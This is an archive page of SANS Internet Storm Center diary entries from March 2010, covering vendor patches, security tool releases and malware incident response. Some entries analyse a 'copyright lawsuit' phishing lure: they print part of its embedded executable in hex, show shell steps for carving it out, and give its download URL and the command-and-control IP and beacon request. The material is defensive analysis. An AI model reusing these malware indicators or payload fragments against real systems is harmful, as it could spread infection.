Diaries

Published: 2010-03-31

PDF Arbitrary Code Execution - vulnerable by design.

Didier Stevens, who probably knows the PDF format better then most and has written some great PDF analysis tools, published a very interesting and concerning blog post [1].

In this post, he outlines how PDFs can be used to execute code. Nothing new you may say... plenty of exploits have done this in the past. This is different: He is not using a vulnerability, but a feature. Evidently, PDFs have the ability to execute code by design. Since this is not an implementation, but a design problem, various PDF readers are vulnerable. In his blog, Didier show a video of the exploit using Adobe's PDF reader. Adobe's reader will show a warning and ask the user for permission. However, the wording of this warning may be changed by the attacker. Foxit, a popular alternative to Adobe's reader, will show no warning.

At this point, Didier does not provide a public PoC exploit. However, he says he is in contact with vendors.

 

[1] http://blog.didierstevens.com

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

2 Comments

Published: 2010-03-30

Sharing the Tools


In the malware analysis world, you have to have your tools that you feel most comfortable to use, otherwise, a task that could be
accomplished in 10 minutes would take hours.

But sometimes, finding the right tool for the task can be quite a challenge. This is one of the reasons that I decided to create a site,
called www.mysectools.com, where I am able to share some tools that were quite valuable on my day by day malware analysis tasks.

Now, I would like to comment on two tools that I was recently introduced.

The first one is not directly related to Malware Analysis (at least on the concept), since it is more a develpment tool. It is called
WinAPIOverride32 .
It is actually a package/suite with 3 different tools, but the one that I like most is the dumper.exe, because sometime you want more
than just a click and dump application. This one gives you  the freedom to chose what/how you want to dump a module, for example.

The second one is an Anti-Rootkit tool, called XueTr , which honestly I didnt try
outside a controlled environment (vmware,etc...).

This is another quite powerful tool, which in some point reminds me IceSword which if you dont know, I would recommend to check.

Happy Malware Analysis!

----------------------------------------------------------------

Pedro Bueno (pbueno /%%/ isc. sans. org)

Twitter: http://twitter.com/besecure

www.mysectools.com

 

3 Comments

Published: 2010-03-30

Zigbee Analysis Tools

At today's SANS SCADA Conference in Orlando Josh Wright of InGuardians gave a very interesting talk on Zigbee security.  Josh is leading a project to build a framework for Zigbee analysis tools that he calls "Killerbee".  From the project website:

KillerBee is a Python based framework and tool set for exploring and exploiting the security of ZigBee and IEEE 802.15.4 networks. Using KillerBee tools and a compatible IEEE 802.15.4 radio interface, you can eavesdrop on ZigBee networks, replay traffic, attack cryptosystems and much more. Using the KillerBee framework, you can build your own tools, implement ZigBee fuzzing, emulate and attack end-devices, routers and coordinators and much more.

Let us know via our contact page or via the comment link below if you are doing any Zigbee experimentation and what you've learned so far.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2010-03-30

VMWare Security Advisories Out

Update: Tuesday :

...and there is New Java patches too... http://java.sun.com/javase/6/webnotes/ReleaseNotes.html

--------------------------------------

Yes, today is monday, but we can already call it a week of patches/advisories.

We already got the Apple advisories , we already know about MS OOB patch release tomorrow (March 30th), and today VMWare has released the following new and updated security advisories:

New - VMSA-2010-0005
http://lists.vmware.com/pipermail/security-announce/2010/000086.html

Updated - VMSA-2009-0016.5
http://lists.vmware.com/pipermail/security-announce/2010/000087.html

Update - VMSA-2010-0002.1
http://lists.vmware.com/pipermail/security-announce/2010/000088.html

Enjoy! Today is monday!:)

 

------------------------------------------------------------------

Pedro Bueno (pbueno /%%/ isc. sans. org)

Twitter: http://twitter.com/besecure

http://www.mysectools.com

1 Comments

Published: 2010-03-29

OOB Update for Internet Explorer MS10-018

Microsoft Security Bulletin MS10-018 - Critical

This update resolves 10 different vulnerabilities in Internet Explorer, of which the most severe impact can be execution of arbitrary code. All versions of IE from 5.01 to 8.0 are affected to varying degrees. Both servers and workstations should be updated. The update replaces MS10-002, and addresses the MS Advisory 981374 vulnerability. Time to patch! It is a cumulative update.

Here is a listing of the related vulnerabilities and CVE entries:
Uninitialized Memory Corruption Vulnerability - CVE-2010-0267   
Post Encoding Information Disclosure Vulnerability - CVE-2010-0488   
Race Condition Memory Corruption Vulnerability - CVE-2010-0489   
Uninitialized Memory Corruption Vulnerability - CVE-2010-0490   
HTML Object Memory Corruption Vulnerability - CVE-2010-0491   
HTML Object Memory Corruption Vulnerability - CVE-2010-0492   
HTML Element Cross-Domain Vulnerability - CVE-2010-0494   
Memory Corruption Vulnerability - CVE-2010-0805   
Uninitialized Memory Corruption Vulnerability - CVE-2010-0806   
HTML Rendering Memory Corruption Vulnerability - CVE-2010-0807

http://blogs.technet.com/msrc/archive/2010/03/30/security-bulletin-ms10-018-released.aspx

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

2 Comments

Published: 2010-03-29

Nmap 5.30BETA1 released

Nmap 5.30BETA1 is out. Many new features, new NSE scripts, nping, some syntax changes, some bug fixes and more. Nmap is hands down one of my favourite tools and a must have for any technical information security professional. Much more information and downloads available as always at: http://nmap.org/

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

0 Comments

Published: 2010-03-29

OpenSSL V 1.0.0 released!

OpenSSL 1.0.0 is now available, a major release!

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

0 Comments

Published: 2010-03-29

APPLE-SA-2010-03-29-1 Security Update 2010-002 / Mac OS X v10.6.3

Apple has published a security update covering a number of issues, with varying impacts.

Security Update 2010-002 / Mac OS X v10.6.3 is now available and addresses the following:

AppKit:  CVE-ID:  CVE-2010-0056
Application Firewall:  CVE-ID:  CVE-2009-2801
AFP Server:  CVE-ID:  CVE-2010-0057, CVE-2010-0533
Apache:  CVE-ID:  CVE-2009-3095
ClamAV:  CVE-ID:  CVE-2010-0058
CoreAudio:  CVE-ID:  CVE-2010-0059, CVE-2010-0060
CoreMedia:  CVE-ID:  CVE-2010-0062
CoreTypes:  CVE-ID:  CVE-2010-0063
CUPS:  CVE-ID:  CVE-2010-0393
curl:  CVE-ID:  CVE-2009-2417, CVE-2009-0037
Cyrus:  IMAP CVE-ID:  CVE-2009-2632
Cyrus SASL:  CVE-ID:  CVE-2009-0688
DesktopServices:  CVE-ID:  CVE-2010-0064, CVE-2010-0537
Disk Images: CVE-ID:  CVE-2010-0065, CVE-2010-0497
Directory Services:  CVE-ID:  CVE-2010-0498
Dovecot:  CVE-ID:  CVE-2010-0535
Event Monitor:  CVE-ID:  CVE-2010-0500
FreeRADIUS:  CVE-ID:  CVE-2010-0524
FTP Server:  CVE-ID:  CVE-2010-0501
iChat Server:  CVE-ID:  CVE-2006-1329, CVE-2010-0502, CVE-2010-0503, CVE-2010-0504
ImageIO:  CVE-ID:  CVE-2010-0505, CVE-2010-0041, CVE-2010-0042, CVE-2010-0043
Image RAW:  CVE-ID:  CVE-2010-0506, CVE-2010-0507
Libsystem:  CVE-ID:  CVE-2009-0689
Mail:  CVE-ID:  CVE-2010-0508, CVE-2010-0525
Mailman:  CVE-ID:  CVE-2008-0564
MySQL:  CVE-ID:  CVE-2008-4456, CVE-2008-7247, CVE-2009-2446, CVE-2009-4019, CVE-2009-4030
OS Services:  CVE-ID:  CVE-2010-0509
Password Server:  CVE-ID:  CVE-2010-0510
perl:  CVE-ID:  CVE-2008-5302, CVE-2008-5303
PHP:  CVE-ID:  CVE-2009-3557, CVE-2009-3558, CVE-2009-3559, CVE-2009-4017, CVE-2009-3557, CVE-2009-3558, CVE-2009-3559, CVE-2009-4142, CVE-2009-4143
Podcast Producer:  CVE-ID:  CVE-2010-0511
Preferences:  CVE-ID:  CVE-2010-0512
PS Normalizer:  CVE-ID:  CVE-2010-0513
QuickTime:  CVE-ID:  CVE-2010-0062, CVE-2010-0514, CVE-2010-0515, CVE-2010-0516, CVE-2010-0517, CVE-2010-0518, CVE-2010-0519, CVE-2010-0520, CVE-2010-0526
Ruby:  CVE-ID:  CVE-2009-2422, CVE-2009-3009, CVE-2009-4214, CVE-2009-1904
Server Admin:  CVE-ID:  CVE-2010-0521, CVE-2010-0522
SMB:  CVE-ID:  CVE-2009-2906
Tomcat:  CVE-ID:  CVE-2009-0580, CVE-2009-0033, CVE-2009-0783, CVE-2008-5515, CVE-2009-0781, CVE-2009-2901, CVE-2009-2902, CVE-2009-2693
unzip:  CVE-ID:  CVE-2008-0888
vim:  CVE-ID:  CVE-2008-2712, CVE-2008-4101, CVE-2009-0316
Wiki Server:  CVE-ID:  CVE-2010-0523, CVE-2010-0534
X1: 1 CVE-ID:  CVE-2009-2042, CVE-2003-0063
xar:  CVE-ID:  CVE-2010-0055

To download: http://www.apple.com/support/downloads/
For more information:

http://support.apple.com/kb/HT1222

http://support.apple.com/kb/HT4014

http://support.apple.com/kb/HT4015

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

0 Comments

Published: 2010-03-28

Honeynet Project: 2010 Forensic Challenge #3

If you like a good InfoSec puzzle the good people over at the Honeynet Project are at it again.  They have just released Challenge #3 in their 2010 Forensic Challenge series.

This time they want you to analyze an image from a suspected infected workstation for a user who has discovered suspicious banking transactions.  There is swag involved, and submission are due by April 18th.

Results of the previous two challenges are available from the Honeynet Project Challenges page.

Have fun!

-- Rick Wanner - rwanner at isc dot sans dot org

0 Comments

Published: 2010-03-27

Create a Summary of IP Addresses from PCAP Files using Unix Tools

Every once in a while we collect large PCAP files for analysis. However, there are times when we are looking for a summary list of either source or destination addresses in those PCAP that were seen over a period of time in those files. The two examples shown here represent two suspicious ports that I noticed targeted this week and wanted to know the source IPs of this traffic.

First, if needed, we need to remove the IP or IPs we don't want to include in our summary. If we are going to reuse a PCAP filter several times, it is better to create a libpcap filter in a file and use tcpdump -F filter to use it. (tcpdump -nr file.pcap -F parsing_filter).


Breaking down the filter

In order to be able to manipulate the data to our advantage, we need to determine what we are looking for. With our two examples, we are going to find which source IP addresses sent a TCP SYN packet to our gateway IP 192.168.21.32 to port 465 and 2522 with the number of occurrence that happened in each of the PCAP files.

My complete traffic parsing looks like this:

guy@seeker$ tcpdump -ntr 2010032501 'dst host 192.168.21.32 and tcp[13] = 0x02 and dst port 2522' | awk '{print $2}' | tr . ' ' | awk '{print $1"."$2"."$3"."$4}' | sort | uniq -c | awk ' {print $2 "\t" $1 }'

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)
XX.169.170.84 10

Breaking Down each Sections

- Part 1 is the tcpdump switches and we are using -n (don't resolve), -t (don't print date/time) and -r 2010032501 (file name to replay).

- Part 2 is the libpcap filter ('dst host 192.168.21.32 and tcp[13] = 0x02 and dst port 2522') which filter all inbound TCP SYN packets (tcp[13] = 0x02) to our gateway (dst host 192.168.21.32) to TCP port 2522.

IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,nop,wscale 3,nop,nop,timestamp 895725079 0,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,nop,wscale 3,nop,nop,timestamp 895725088 0,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,nop,wscale 3,nop,nop,timestamp 895725098 0,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>
IP xx.169.170.84.50316 > 192.168.21.32.2522: S 2853915482:2853915482(0) win 65535 <mss 1412,sackOK,eol>


- Part 3 we add a pipe with awk (| awk '{print $2}') to print only the source IP from our tcpdump result. Field $2 (source IP) could be changed to $4 to use the destination address.

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316
xx.169.170.84.50316


- Part 4 we add a pipe with tr (| tr . ' ') to change the period to a space so we can remove the source port (50316) in the next step.

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316
xx 169 170 84 50316

- Part 5 we add a pipe with awk (| awk '{print $1"."$2"."$3"."$4}') to reconstruct the source IP address(es).

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84

- Part 5 we add a pipe with sort ( | sort) to sort our traffic by IPs. In this case we only have one source.

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84
xx.169.170.84

- Part 6 we add a pipe with uniq -c (| uniq -c) to count the number of times a source IP was see in the PCAP file.

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)

10 xx.169.170.84

- The last part is just for formatting purposes, we reverse the order of the last output and insert a tab (| awk ' {print $2 "\t" $1 }') to show the IPs in the first collumn and the number of time seen in the second.

reading from file 2010032501, link-type LINUX_SLL (Linux cooked)

xx.169.170.84 10

 

Another example with its results to destination port TCP 465.

guy@seeker$ tcpdump -ntr 2010032508 'dst host 192.168.21.32 and tcp[13] = 0x02 and dst port 465' | awk '{print $2}' | tr . ' ' | awk '{print $1"."$2"."$3"."$4}' | sort | uniq -c | awk ' {print $2 "\t" $1 }'

reading from file 2010032508, link-type LINUX_SLL (Linux cooked)

XX.237.148.241 3
XXX.197.208.107 3
XXX.199.183.68 3
XXX.22.87.36 3

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

8 Comments

Published: 2010-03-27

HP-UX Running NFS/ONCplus, Inadvertently Enabled NFS

HP issued a security bulletin for HP-UX 11.31 (running NFS/ONCplus version B.11.31_08 or prior), where a remote user can access NFS shares on the target system if NFS/ONCplus is running, NFS maybe inadvertently enabled. The complete list of affected versions and resolution is available here.

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

Intéresser à prendre SANS Sec 503 en français? 
Enregistre toi à http://www.sans.org/nice-2010/ pour le Communité SANS à Nice, France - du 21 au 26 juin 2010

0 Comments

Published: 2010-03-26

SIFT2.0 SANS Investigative Forensics Toolkit released

SANS Faculty Fellow Rob Lee created the SANS Investigative Forensic Toolkit(SIFT) Workstation, which is also featured in the SANS FOR 508 course, in order to show that advanced investigations and investigating hackers can be accomplished using freely available open-source tools. The new version of SIFT was just released and is a VMware Appliance that is pre-configured with all the necessary tools to perform a detailed digital forensic examination. More information on the SANS forensics curriculum and SIFT2.0 can be found on https://computer-forensics.sans.org/ , respectively the download section on that page.

9 Comments

Published: 2010-03-26

Getting the EXE out of the RTF again

Since we got some mails from readers who had trouble getting the malware extraction technique described in http://isc.sans.org/diary.html?storyid=6703 to work on yesterday's malicious "copyright lawsuit" sample , here's a quick walk-through again on how to carve an EXE out of a DOC or RTF file. 

$ file suit_documents.doc
suit_documents.doc: Rich Text Format data, version 1, ANSI

Hmm, looks like this DOC is an RTF ... Let's see what it contains

$ head suit_documents.doc
{rtf1ansiansicpg1252deff0{fonttbl{f0fswissfcharset0 Arial;}}
{*generator Msftedit 5.41.15.1515;}viewkind4uc1pardlang1033f0fs20{objectobjemb{*objclass Package}objw795objh765{*objdata
01050000
02000000
08000000
5061636b61676500
00000000
00000000
6f740000
0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164

OK .. looks indeed like an RTF with an embedded object. The pile of numbers are all ASCII codes in Hex, but before we can convert them to readable characters, we first have to strip away the initial two lines, because their presence would confuse the Perl statement that follows later.

$ cat suit_documents.doc | sed '1,2d' > suit1.temp
$ head suit1.temp
01050000
02000000
08000000
5061636b61676500
00000000
00000000
6f740000
0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164

Now, we are ready for the transformation from Hex ASCII codes to printable characters:

$ cat suit1.temp | perl -ne 's/(..)/print(chr(hex($1)))/ge' > suit2.temp

So far, the old method still seems to work: We locate "objdata" in the RTF document, strip out everything in front, then feed the blob into Perl to convert the hexadecimal codes to actual ASCII characters. I changed the Perl command slightly compared to the earlier diary on the subject, because one of the problems that people seem to have is related to how "end of line" is treated on Windows vs Unix. The earlier version

$cat detail.rtf | sed -e '1,3d' | perl -ne 's/(..)/print chr(hex($1))/ge' > detail.bin

kept any DOS line terminators unchanged, which doesn't bode well for the resulting executable.  The new version

$ cat suit1.temp | perl -ne 's/(..)/print(chr(hex($1)))/ge' > suit2.temp

is now really only printing out converted hex codes, and is dropping all the CR/LF line terminators that are present in the original file after every line. The resulting file is still in "Object Package" format, but if you look closely, you can see the tell-tale "MZ" that marks the start of an executable:

What makes this case a bit more convoluted than last year's example is that the bad guys tried real hard to disguise the contents. This time, the initial file had a .DOC extension, but was in fact an .RTF format, which contained an embedded COMPLA~1.EXE that had a harmless looking Icon (3.ico) and was displayed to the user as "docs.pdf". Yup,pretty sneaky. You can see all these file names in the hex output above.

Now, how to get the EXE out. According to the mentioned earlier diary, the numbers between the EXE filename and the "MZ" header mark the size of the executable that we need to cut out. In this case, we have "00 10 74 00 00" in that position:

00000070 4c 41 7e 31 2e 45 58 45 00 10 74 00 00 4d 5a 90 |LA~1.EXE..t..MZ.|

What my earlier example didn't make clear is that these numbers have to be read "right to left" to determine the size. In the current case, the size is 007410hex, which converts to 29712 bytes.

Let's carve it out. We need to skip to position 0x7D (=125) at the beginning of the file to get to the "MZ" marker, and from there, the EXE should be 29712 bytes long.

$ dd if=suit2.temp of=suit2.exe skip=125 count=29712 bs=1
29712+0 records in
29712+0 records out
29712 bytes (30 kB) copied, 0.15203 s, 195 kB/s

$ md5sum suit2.exe
ead062fb0aca0e3d0e8c12c4cf095765 suit2.exe

Voilà! Now, we can use this hash on http://www.virustotal.com/buscaHash.html to see if someone else has analyzed this file before :) 

 

 

1 Comments

Published: 2010-03-25

Zeus wants to do your taxes

I've received reports of suspicious emails claiming to be from the IRS.  It's a common scheme to get a user to click and run an executable.

It looks like zeus/zbot to me (more on that here: https://zeustracker.abuse.ch/faq.php their cert is a little non-standard,) but I can't share the details yet.  If you've received one of these emails and don't mind sharing the details with our readers, please submit a copy (via: http://isc.sans.org/contact.html)

If you want to check out your own logs in the meantime, I'd suggest looking for domains that look like www.irs.gov.<stuff> and downloaded executables with the word "tax" in them.

For those with enough free-time to try to track the different groups using zeus, this one has an Avalanche feel to it.

0 Comments

Published: 2010-03-25

Responding to "Copyright Lawsuit filed against you"

The Scenario:

 Let's say you're responsible for responding to an email like that reported here: https://isc.sans.org/diary.html?storyid=8497

Assess:

Is this email a problem?

It certainly appears to be appealing to the recipients fears with the scary legal language.  There's a typo or two in there that might make you suspicious.  Real or not, a document like this should be brought to the attention of your security/legal departments.  So it's likely a problem of one sort or another.

What is it?

You could start by checking into the source of the email and the domain hosting the link.  In this case, the originator appears to be a mail-server for a small city.  The domain has been around for nearly a year, but was just updated a few days ago.  Domaintools.com is your friend.

If you're equipped for it, you may ant to start by checking out the document by pulling down to a safe machine.  In my case it's a unix box since it appears to be a word document.  I craft a simple wget script to pull the file down looking like a vulnerable version of IE.

wget --save-cookies=./cookies -U "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" $1

Curiosity getting the better of me, I look at the file a bit and see:

{rtf1ansiansicpg1252deff0{fonttbl{f0fswissfcharset0 Arial;}}
{*generator Msftedit 5.41.15.1515;}viewkind4uc1pardlang1033f0fs20{objectobjemb{*objclass Package}objw795objh765{*objdata
01050000
02000000
08000000
5061636b61676500
00000000
00000000
6f740000
0200646f63732e70646600433a5c446f63756d656e747320616e642053657474696e67735c4164
6d696e6973747261746f725c4465736b746f705c332e69636f000000030010000000433a5c434f
4d504c417e312e45584500107400004d5a90000300000004000000ffff0000b800000000000000
400000000000000000000000000000000000000000000000000000000000000000000000d00000
000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072
756e20696e20444f53206d6f64652e0d0d0a240000000000000009d117d84db0798b4db0798b4d
b0798b4db0788b51b0798b2faf6a8b48b0798b4b93728b49b0798b8ab67f8b4cb0798bb2907d8b
4cb0798b526963684db0798b00000000000000000000000000000000504500004c0104000fd8a9
4b0000000000000000e0000f010b010600001e00000052000000000000c02a0000001000000030
00000000400000100000000200000400000000000000040000000000000000a000000004000000
000000020000000000100000100000000010000010000000000000100000003033000052000000
...

Yeah, that doesn't look good.  Let's calculate an md5sum and see what others think of it.

$ md5sum suit_documents.doc
6db76304a2aff6bef94364b86abd8b7f  suit_documents.doc

 Since you're a lone responder and don't have an army of reverse engineers on your staff, we'll leverage this information to see what the group-mind knows about this.

I use the hash-search at virus total to see if someone's already working on this: http://www.virustotal.com/buscaHash.html

In this case, this yields the following results: http://www.virustotal.com/analisis/9b762ff9d2103022bf1476f2c55db91475f31526522716e827875801f92a0d87-1269529133

Some interesting things come back, we know that this is likely some sort of downloader disguised as a document.

I'll also search through http://www.threatexpert.com/ by the md5sum to see if it has already been analyzed.  In this case it hasn't.  I could ship it off there for analysis or one of the other fine sandbox tools such as Anubis (http://anubis.iseclab.org) or CWSandbox (http://mwanalysis.org/)

Looking at the earlier diary entry we see results from Anubis showing some network activity.  Now we have a couple of things to look for to measure impact:

  • Email details to search our mail-logs to determine who received the lure message.
  • The URL of the initial downloader to see who clicked on it and brought it into the network.
  • The network behavior of a system that executed the code.

How bad is it for us?

Using those details it's time to evaluate the impact this attack has had on your firm.  If you have anyone who downloaded the file, or evidence of a machine reaching out for the next-stage then you pull your Malware Incident response document off of the shelf and follow that.  We all have differing levels of documentation to refer to, but there's always some sort of plan, even if it's "update resume."

Protect

While you're assess the impact (greps take a while to run sometimes) you have some information that you can leverage to protect the people in your network.  You have email addresses and URLs to block and malware to submit to your vendor (assuming they're not on the virustotal list like mine wasn't.)  Acting quickly on this protection phase makes your clean-up phase go easier.

Respond/Clean-up

Now that you have your list of machines that were exposed and your Malware incident response document handy, you follow that to make your systems and network all shiny and clean.

Report

This step is important. 

In my environment, my boss likes to know what it is that I'm doing in the dark data closet.  So keeping track of the event, it's impact, etc. is good for not only tracking the incident, but also review time.

When you were researching the IP that sent the email and hosting the URL (you still have that up in a browser, right?) it is also critical that you report that to the abuse contacts.  Send a kind email reporting the issue, (because they'll likely get a few reports, and most of them might not be so kind.) which helps more than just your own environment.

 Learning from Others/Helping Others

You will want to follow a similar process in response to events reported here and in other blogs and media.  It not only helps protect you from what is hitting other folks, but you may also uncover a gap in your internal detection process.

By submitting malicious URLs to proxy-filter vendors, and malware to AV vendors you help protect not only your environment, but also your neighbors.  If fewer of your neighbors are getting infected, then that's fewer spam-bots, and phishing-sites the eventually target you.

3 Comments

Published: 2010-03-25

"Copyright Lawsuit filed against you"

Overview

An email is being sent out warning the recipient of a "Copyright Lawsuit filed against you."  We received a copy here and a number of .EDUs have reported it's receipt.  It looks something similar to:

March 24, 2010
Crosby & Higgins
350 Broadway, Suite 300
New York, NY 10013

To Whom It May Concern:

On the link bellow is a copy of the lawsuit that we filed against you in court on March 11, 2010.
Currently the Pretrail Conference is scheduled for April 11th, 2010 at 10:30 A.M. in courtroom #36.
The case number is 3485934. The reason the lawsuit was filed was due to a completely inadequate response from your company for copyright infrigement that our client Touchstone Advisories Inc is a victim of Copyright infrigement
hXXp://www.touchstoneadvisorsonline.com/lawsuit/suit_documents.doc
Touchstone Advisories Inc has proof of multiple Copyright Law violations that they wish to present in court on April 11th, 2010.

Sincerely,

Mark R. Crosby
Crosby & Higgins LLP

The law-firms named in the email, header, and sending server all appear to be a mish-mash of existing firms.

If a user clicks on the link and opens the document it will attempt to download additional payload.

Initial Detection

Currently only a few AV solutions detect the initial document: http://www.virustotal.com/analisis/9b762ff9d2103022bf1476f2c55db91475f31526522716e827875801f92a0d87-1269486837

Behavioral Notes

Following Daniel's process (http://isc.sans.org/diary.html?storyid=6703) one could extract the executable and determine what it's up to.

It appears to reach out to 121.14.149.132:80 to make a request similar to:

GET /fwq/indux.php?U=1234@1014@1@0@0@c791d4a4a147b2cd1843fe4f7f27f3a1df63f95daf0c3ddcd5f1b1e4538fd803

 

5 Comments

Published: 2010-03-24

Cisco security updates

Cisco released 7 new security updates to various different products today.  More information at their site: http://ww.cisco.com/en/US/products/products_security_advisories_listing.html

-Kyle Haugsness

0 Comments

Published: 2010-03-24

Wax nostalgic - commodore64 updated to present time

Slow news/incidents day.... So I will post something slightly off-topic.  Yes, the story was on Slashdot and it may never come to fruition (or even be suitably priced), but the news that Commodore USA was releasing a new PC embedded into a keyboard had me reminiscing of my first computer, the commodore64.  New site here: http://www.commodoreusa.net

I can't tell you how many times I read "syntax error" in response to my prodding of the BASIC language.  Hmm, how do I make this into a security-related article?  It would be difficult to install a keyboard logger on these things!!  So perhaps it fits into your physical security strategy?  Does anyone conquer physical security threats with creative choices of hardware?  For instance, if you have a policy of no USB flash drives do you enforce that through hardware restrictions?

-Kyle Haugsness

6 Comments

Published: 2010-03-24

".sys" Directories Delivering Driveby Downloads

Our read Paul observed malware being delivered from the ".sys" directory of various web sites. The URL follows the scheme:

http://evilexample.com/.sys/?action=....

In response to clicking on the link, the user is asked to install the software. According to Paul, he observed the link being delivered via Facebook which of course makes the message more plausible and it is likely that users install the software thinking it came from a "Friend". Before adding a specific block for ".sys", Paul's web filter caught about 60% of these exploits.

Once a user follows the link, additional exe files are downloaded from ".sys" directories. The file names Paul observed are p.exe, go.exe and v2captcha21.exe.


------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

7 Comments

Published: 2010-03-23

The Top 10 Riskiest US Cities for Cybercrime

A study by Symantec's Security Response Group and Sperling's BestPlaces was published that indicated the top 10 riskiest US cities for being a victim of cybercrime. The study does have some assumptions that all might not agree with but one of the key points is that the prevalence of "free wi-fi" is a risk factor for cybercrime.

If you think about it, the one thing that makes electronic crime appealing is that it can be done anonymously with few fingerprints. A few years ago I was trying to convince an information security officer at a public institution that there were threats with free wireless internet that he was not addressing.  To demonstrate, I associated myself with the access point and then sniffed all the traffic back and forth. I saw IM conversations, GMail (which by default is all over HTTP but can be forced to HTTPS), Facebook, etc.  Sadly, convenience trumped security (even the few security measures that could have been used at the time and still allow convenience).

Another aspect is that free wireless is an attractive resource for those who want to be anonymous. If you wanted to commit online crime, what better place than a public wireless hotspot with hundreds of people using them that is wide open? For instance, what was believed to be the first arrest for theft of wireless service was an individual who was using an unprotected residential wireless access point to download child pornography from his vehicle in the street.

What does this mean for you? If you are using a public wi-fi hotspot, don't do anything you would mind other people snooping in on or fire up the corporate VPN before you do anything. If you want to shop online, you might want to consider doing that at home. And if you operate a public wi-fi hotspot, track and log all MACs that access your network and monitor outbound traffic for malicious use. 

--
John Bambenek
bambenek at gmail /dot/ com

2 Comments

Published: 2010-03-21

Responding To The Unexpected

We all know that having an Incident Response plan in place helps to minimize the damage caused by a security incident.

We also know that not everyone has one.

I was fortunate to attend fellow handler Lenny Zeltser's talk on "How To Respond To An Unexpected Security Event"  at SANS 2010 in Orlando earlier this month.

If you don't have an IR plan in place, take a look at his presentation, which is available in pdf form on his web site.

 

Christopher Carboni - Handler On Duty

0 Comments

Published: 2010-03-21

Skipfish - Web Application Security Tool

Michal Zalewski (lcamtuf), a Polish security researcher and author of many tools and books, is at it again.  On Friday, he released a fully automated, active web application security tool known as skipfish.  This tool allows developers and security professionals to have a solid reconnaissance tool which scans at high speed tools, easy to use, and has a number of different security checks with limited false positives.  In my particular environment, we are extremely budget poor (taking a 2nd budget cuts within under 6 months left in the fiscal is bad and I know others have it worse than we do).  So having the possibility to increase my tool set without spending a lot of money sits very well with our administration. From my initial testing yesterday, it did detect a few issues within a sample website which had not been detected prior. So in my book, this is a great plus.

The tool is under the Apache 2.0 license and is located at http://code.google.com/p/skipfish/  .  I see that today there has been a number of changes today to correct a number of issues since it was initially released yesterday.  I expect that this tool will be much more stable within the next few days. 

Scott Fendley ISC Handler

2 Comments

Published: 2010-03-20

BitDefender 2010 Update Problem

We have started to receive reports this morning concerning a popular consumer antivirus product has caused some grief today.  BitDefender 2010 appears to have released a set of bad definitions.  Unfortunately, these bad virus definitions appear to detect core DLL files and even parts of BitDefender, itself, as infected by "Trojan.FakeAlert.5".  There is quite a thread discussing this issue on the BitDefender Forums.

If you or your organization uses BitDefender, I would heavily recommend that you disable auto-update of the definitions until corrected ones are released soon.  Also, I would recommend preparing to do a lot of hands-on clean up to reverse those files which were quarantined by accident.

Scott Fendley ISC Handler

0 Comments

Published: 2010-03-20

Firefox 3.6.2 to be released March 30

In the past month, there has been lots of discussions involving an unpatched security vulnerability in Firefox 3.6.  Unfortunately, there was very limited information released on the vulnerability and much of the discussions revolved around if the reports were real or just FUD.  Mozilla eventually received enough information where they could reproduce the problem and posted an advisory late on 3/18/2010 (yes I know that I missed this being released yesterday, and I blame the NCAA tourney for that). 

In any case, Firefox 3.6.2 is scheduled for release on March 30, but the beta build is available from their nightly candidate area.  More information is located at Mozilla Security Blog. Please schedule some time to test this version and get this into your update pipeline for user workstations.

Scott Fendley ISC Handler

1 Comments

Published: 2010-03-19

I Know What Your Office Equipment Did Last Summer...

Yesterday there was a great article in the Toronto Star that discusses a potential security
risk that may not be obvious to some Business owners.  You can find that article here.

G.N. White
ISC Handler on Duty
 

1 Comments

Published: 2010-03-18

